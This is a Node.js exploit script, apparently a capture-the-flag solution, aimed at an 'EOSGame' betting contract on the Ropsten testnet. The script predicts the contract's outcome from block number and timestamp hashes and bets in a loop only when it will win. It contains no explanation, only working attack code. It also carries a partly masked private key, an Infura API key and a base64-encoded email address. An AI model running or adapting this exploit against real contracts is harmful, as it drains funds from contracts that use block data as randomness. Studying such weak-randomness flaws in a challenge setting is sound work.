1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283
| let Web3 = require("web3"); let Tx = require('ethereumjs-tx'); const BigNumber = require('bignumber.js');
let privKey = new Buffer.from('1dc72fa....', 'hex'); let fromAddress = "0x901B1....";
let contractAddress = "0x804d8B0f43C57b5Ba940c1d1132d03f1da83631F";
let web3 = new Web3();
let INFURA_API_KEY = "9762c...." let ROPSTEN_URL = "https://ropsten.infura.io/" + INFURA_API_KEY local = 'http://192.168.142.145:8545' web3.setProvider(new Web3.providers.HttpProvider(ROPSTEN_URL))
let abi = [{ "constant": true, "inputs": [], "name": "eosBlanceOf", "outputs": [{ "name": "", "type": "uint256" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [], "name": "bigBlind", "outputs": [], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": false, "inputs": [{ "name": "b64email", "type": "string" }], "name": "CaptureTheFlag", "outputs": [], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": false, "inputs": [], "name": "initFund", "outputs": [], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": false, "inputs": [], "name": "smallBlind", "outputs": [], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": true, "inputs": [{ "name": "", "type": "address" }], "name": "bet_count", "outputs": [{ "name": "", "type": "uint256" }], "payable": false, "stateMutability": "view", "type": "function" }, { "inputs": [], "payable": false, "stateMutability": "nonpayable", "type": "constructor" }, { "anonymous": false, "inputs": [{ "indexed": false, "name": "b64email", "type": "string" }, { "indexed": false, "name": "slogan", "type": "string" }], "name": "FLAG", "type": "event" }]
function sendSigned_Old(txData) { }
function sendSigned(txData) { web3.eth.accounts.signTransaction(txData, '0x1dc72fa8....') .then(RLPencodedTx => { let transact = web3.eth.sendSignedTransaction(RLPencodedTx['rawTransaction']); transact.on('confirmation', (confirmationNumber, receipt) => { console.log('confirmation', confirmationNumber); });
transact.on('transactionHash', hash => { console.log('hash', hash); });
transact.on('receipt', receipt => { console.log('reciept', receipt); });
transact.on('error', console.error);
setTimeout(nonce => { process.exit() }, 1000); }); }
let txData = { chainId: 3, gas: web3.utils.toHex(2500000), gasLimit: web3.utils.toHex(2500000), gasPrice: web3.utils.toHex(40*1e10), to: contractAddress, from: fromAddress, value: "0x0", }
let EOSGameContract = new web3.eth.Contract(abi, contractAddress); let MOD_NUM = 20; let initfund = EOSGameContract.methods.initFund().encodeABI(); let smallblind = EOSGameContract.methods.smallBlind().encodeABI(); let bigblind = EOSGameContract.methods.bigBlind().encodeABI(); let ctf = EOSGameContract.methods.CaptureTheFlag('amF5ODBAcHJvdG9ubWFpbC5jb20=').encodeABI();
function getshark() { return new Promise((resolve, reject) => { web3.eth.getBlock('latest').then(results => { console.log('results.number: ' + results.number); console.log('results.timestamp: ' + results.timestamp); let number = results.number; let timestamp = results.timestamp; let temp = web3.eth.abi.encodeParameter('uint256', number); let temp2 = web3.eth.abi.encodeParameter('uint256', timestamp);
let encry1 = web3.utils.keccak256(temp); let encry2 = web3.utils.keccak256(temp2); let uint256 = new BigNumber('115792089237316195423570985008687907853269984665640564039457584007913129639936'); let number1 = new BigNumber(web3.eth.abi.encodeParameter('uint256', encry1)); let number2 = new BigNumber(web3.eth.abi.encodeParameter('uint256', encry2));
let result = number1.plus(number2); console.log("result: ", result.toFormat().replace(/,/g, ''));
if (result.gt(uint256)) { result = result.minus(uint256).toFormat().replace(/,/g, ''); console.log("overflow update result: ", result); }
let seed = web3.eth.abi.encodeParameter('uint256', result); let seed_hash = web3.utils.keccak256(seed); seed_hash = new BigNumber(web3.eth.abi.encodeParameter('uint256', seed_hash)); console.log("seed_hash: ", seed_hash.toFormat().replace(/,/g, ''));
let shark = seed_hash.modulo(MOD_NUM).toFormat().replace(/,/g, ''); console.log("shark: ", shark);
resolve(shark); }); }) }
function getlucky_hash() { return new Promise((resolve, reject) => { EOSGameContract.methods.bet_count(fromAddress).call({ from: fromAddress }, function (err, result) { if (err) { throw err; } console.log("bet_count result: " + result); let getabi = web3.eth.abi.encodeParameter('uint256', result); let encry = web3.utils.keccak256(getabi); let lucky = new BigNumber(web3.eth.abi.encodeParameter('uint256', encry)); console.log("lucky: ", lucky.toFormat().replace(/,/g, ''));
let lhash = lucky.modulo(MOD_NUM).toFormat().replace(/,/g, ''); console.log("lucky_hash: ", lhash); resolve(lhash); }) }) }
EOSGameContract.methods.bet_count(fromAddress).call({ from: fromAddress }, function (err, result) { if (err) { throw err; } console.log("bet_count result: " + result) })
function smallBlind() { web3.eth.getTransactionCount(fromAddress).then(function(lastCountOfTransaction){ let temp = txData; temp['data'] = smallblind; temp['nonce'] = web3.utils.toHex(lastCountOfTransaction); console.log(temp); sendSigned(temp); })
}
function bigBlind() { let temp = txData; temp['data'] = bigblind; console.log(temp); sendSigned(temp); }
let listener = EOSGameContract.events.FLAG(function (error, event) { console.log("recv event data: ") console.log(event); }); listener.on('data', function(event){ console.log("recv event data: ") console.log(event); }) .on('error', console.error);
function exploit() { getshark().then(res => { getlucky_hash().then(ress => { EOSGameContract.methods.eosBlanceOf().call({ from: fromAddress }, function (err, result) { if (err) { throw err; } console.log("eosBlanceOf result: " + result) }) if (res == ress) { console.log("\n===================this is time!!!===================\n"); smallBlind(); } else { console.log("\n===================it is not time!!!===================\n"); } }) }) }
setInterval(nonce => { console.log("going...."); exploit(); }, 2500);
|